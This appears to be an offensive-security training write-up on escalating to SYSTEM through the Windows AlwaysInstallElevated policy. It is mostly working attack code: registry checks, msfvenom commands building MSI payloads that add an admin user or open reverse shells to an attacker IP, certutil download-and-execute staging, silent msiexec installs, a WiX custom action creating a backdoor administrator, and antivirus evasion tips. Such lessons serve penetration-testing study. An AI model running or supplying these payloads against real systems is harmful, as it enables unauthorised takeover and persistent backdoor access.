AlwaysInstallElevated Exploitation

intermediate25 minWriteup

Exploiting AlwaysInstallElevated for SYSTEM

Learning Objectives

  • Check for AlwaysInstallElevated
  • Create malicious MSI
  • Execute MSI as SYSTEM
  • Generate payload with msfvenom

AlwaysInstallElevated is a Windows Group Policy setting that allows any user to install MSI packages with SYSTEM privileges. When enabled, it's an instant privilege escalation - just install a malicious MSI and get SYSTEM.

Think of it like a "VIP installation pass" that Windows gives to everyone. Normally, installing software requires admin rights. With AlwaysInstallElevated, even low-privileged users can run installers as SYSTEM. We just need to give Windows a "malicious installer".

Both Keys Required

AlwaysInstallElevated must be set to 1 in BOTH HKLM and HKCU registry locations. If only one is set, the vulnerability doesn't exist. Always check both.

Checking for AlwaysInstallElevated

batch
1REM Check both registry locations
2 
3REM Local Machine policy
4reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
5 
6REM Current User policy
7reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
8 
9REM Both must return:
10REM AlwaysInstallElevated    REG_DWORD    0x1
11 
12REM If either returns 606070;">#a5d6ff;">"ERROR: The system was unable to find..."
13REM Then the vulnerability does NOT exist
14 
15REM Quick one-liner check
16reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated 2>nul && reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated 2>nul && echo VULNERABLE!

PowerShell Check

powershell
1606070;"># Check both keys
2$HKLM = Get-ItemProperty -Path 606070;">#a5d6ff;">'HKLM:SOFTWAREPoliciesMicrosoftWindowsInstaller' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
3$HKCU = Get-ItemProperty -Path 606070;">#a5d6ff;">'HKCU:SOFTWAREPoliciesMicrosoftWindowsInstaller' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
4 
5if ($HKLM.AlwaysInstallElevated -eq 1 -and $HKCU.AlwaysInstallElevated -eq 1) {
6    Write-Host 606070;">#a5d6ff;">"VULNERABLE - AlwaysInstallElevated is enabled!" -ForegroundColor Red
7} else {
8    Write-Host 606070;">#a5d6ff;">"Not vulnerable" -ForegroundColor Green
9}

WinPEAS & PowerUp

batch
1REM WinPEAS checks automatically
2.winpeas.exe
3 
4REM Look for:
5REM [!] AlwaysInstallElevated is set to 1 in both HKLM and HKCU!
6 
7REM PowerUp check
8Import-Module PowerUp.ps1
9Get-RegistryAlwaysInstallElevated
10 
11REM Output:
12REM HKLMValue: 1
13REM HKCUValue: 1
14REM AbuseFunction: Write-UserAddMSI

Exploitation

Method 1: msfvenom MSI

bash
1606070;"># On attack machine, generate malicious MSI
2 
3606070;"># Add user (no callback required)
4msfvenom -p windows/adduser USER=hacker PASS=Password123! -f msi -o evil.msi
5 
6606070;"># Reverse shell (requires listener)
7msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o shell.msi
8 
9606070;"># Meterpreter
10msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o meterpreter.msi
11 
12606070;"># Transfer to target
13python3 -m http.server 80
14606070;"># On target:
15certutil -urlcache -f http:606070;">//10.10.14.5/evil.msi evil.msi

Method 2: Installing the MSI

batch
1REM Install MSI (runs as SYSTEM!)
2 
3REM Quiet installation (no GUI)
4msiexec /quiet /qn /i evil.msi
5 
6REM Options:
7REM /quiet - No user interaction
8REM /qn    - No UI at all
9REM /i     - Install
10 
11REM After installation:
12REM - If adduser payload: Check net localgroup Administrators
13REM - If reverse shell: Check your listener
14 
15REM Example with adduser:
16msiexec /quiet /qn /i C:	empevil.msi
17net localgroup Administrators
18REM Should show 606070;">#a5d6ff;">'hacker' added
19 
20net user hacker
21REM Shows user exists
22 
23REM Login or use runas
24runas /user:hacker cmd

Method 3: PowerUp Automation

powershell
1606070;"># PowerUp can create and install MSI automatically
2Import-Module PowerUp.ps1
3 
4606070;"># Create MSI that adds admin user
5Write-UserAddMSI
6 
7606070;"># Creates UserAdd.msi in current directory
8606070;"># Adds user: john / Password123!
9 
10606070;"># Install it
11msiexec /quiet /qn /i UserAdd.msi
12 
13606070;"># Verify
14net localgroup Administrators
15606070;"># Should show 'john'
16 
17606070;"># Or use PowerUp's full automation
18Invoke-AllChecks
19606070;"># Shows AbuseFunction for exploitation

Creating Custom MSI

1For more control, create MSI with WiX Toolset:
2 
31. Install WiX Toolset
42. Create .wxs file:
5 
6<?xml version=606070;">#a5d6ff;">"1.0"?>
7<Wix xmlns=606070;">#a5d6ff;">"http://schemas.microsoft.com/wix/2006/wi">
8  <Product Id=606070;">#a5d6ff;">"*" UpgradeCode="GUID" Name="Evil" Version="1.0">
9    <Package InstallerVersion=606070;">#a5d6ff;">"200" Compressed="yes"/>
10    <MediaTemplate/>
11 
12    <CustomAction Id=606070;">#a5d6ff;">"RunCmd" Execute="deferred"
13                  Impersonate=606070;">#a5d6ff;">"no"
14                  Return=606070;">#a5d6ff;">"ignore"
15                  Directory=606070;">#a5d6ff;">"TARGETDIR"
16                  ExeCommand=606070;">#a5d6ff;">'cmd.exe /c net user hacker Password123! /add &amp;&amp; net localgroup Administrators hacker /add'/>
17 
18    <InstallExecuteSequence>
19      <Custom Action=606070;">#a5d6ff;">"RunCmd" After="InstallFiles"/>
20    </InstallExecuteSequence>
21 
22    <Directory Id=606070;">#a5d6ff;">"TARGETDIR" Name="SourceDir"/>
23    <Feature Id=606070;">#a5d6ff;">"ProductFeature"/>
24  </Product>
25</Wix>
26 
273. Compile:
28candle.exe evil.wxs
29light.exe evil.wixobj -o evil.msi

Pre-built MSIs

For most cases, msfvenom is sufficient. Custom MSI creation is rarely needed but useful for AV evasion or specific payload requirements.

AV Evasion Considerations

bash
1606070;"># msfvenom MSI payloads are often detected
2606070;"># Options for evasion:
3 
4606070;"># 1. Use adduser (less flagged than shells)
5msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123! -f msi -o adduser.msi
6 
7606070;"># 2. Use exec to run benign-looking command
8msfvenom -p windows/exec CMD=606070;">#a5d6ff;">"cmd /c net user hacker P@ssw0rd123! /add" -f msi -o exec.msi
9 
10606070;"># 3. Download and execute (two-stage)
11msfvenom -p windows/exec CMD=606070;">#a5d6ff;">"certutil -urlcache -f http://10.10.14.5/shell.exe shell.exe && shell.exe" -f msi -o staged.msi
12 
13606070;"># 4. Encode/obfuscate the MSI
14606070;"># Various tools exist, but beyond scope
15 
16606070;"># 5. Custom MSI with WiX (shown above)
17606070;"># More control, less signatures

Complete Attack Example

batch
1REM === AlwaysInstallElevated Attack Walkthrough ===
2 
3REM 1. Check for vulnerability
4reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
5REM AlwaysInstallElevated    REG_DWORD    0x1  ← GOOD!
6 
7reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
8REM AlwaysInstallElevated    REG_DWORD    0x1  ← GOOD!
9 
10REM 2. Generate payload on attacker
11REM msfvenom -p windows/adduser USER=pwned PASS=Pwned123! -f msi -o adduser.msi
12 
13REM 3. Transfer to target
14certutil -urlcache -f http:606070;">//10.10.14.5/adduser.msi C:	empadduser.msi
15 
16REM 4. Install (as SYSTEM)
17msiexec /quiet /qn /i C:	empadduser.msi
18 
19REM 5. Verify new admin user
20net localgroup Administrators
21REM Administrators:
22REM Administrator
23REM pwned   ← Our new admin!
24 
25REM 6. Use the new credentials
26runas /user:pwned cmd
27REM Password: Pwned123!
28REM Now running as local admin!

AlwaysInstallElevated Methodology

AlwaysInstallElevated Exploitation

1
Check HKLMreg query for AlwaysInstallElevated = 1
2
Check HKCUreg query for AlwaysInstallElevated = 1
3
Generate MSImsfvenom with adduser or shell payload
4
TransferUpload MSI to target
5
Installmsiexec /quiet /qn /i evil.msi
6
AccessUse new admin creds or catch shell

Knowledge Check

Quick Quiz
Question 1 of 3

What two registry locations must have AlwaysInstallElevated set?

Challenges

Exploit AlwaysInstallElevated

Challenge
🔥 intermediate

You've discovered AlwaysInstallElevated is enabled on a Windows target. Exploit it to gain administrator access.

Need a hint? (4 available)

Key Takeaways

  • AlwaysInstallElevated = install MSI packages as SYSTEM
  • Must be set in BOTH HKLM and HKCU registry locations
  • msfvenom generates MSI payloads easily
  • msiexec /quiet /qn /i installs silently
  • adduser payload avoids need for listener
  • PowerUp's Write-UserAddMSI automates exploitation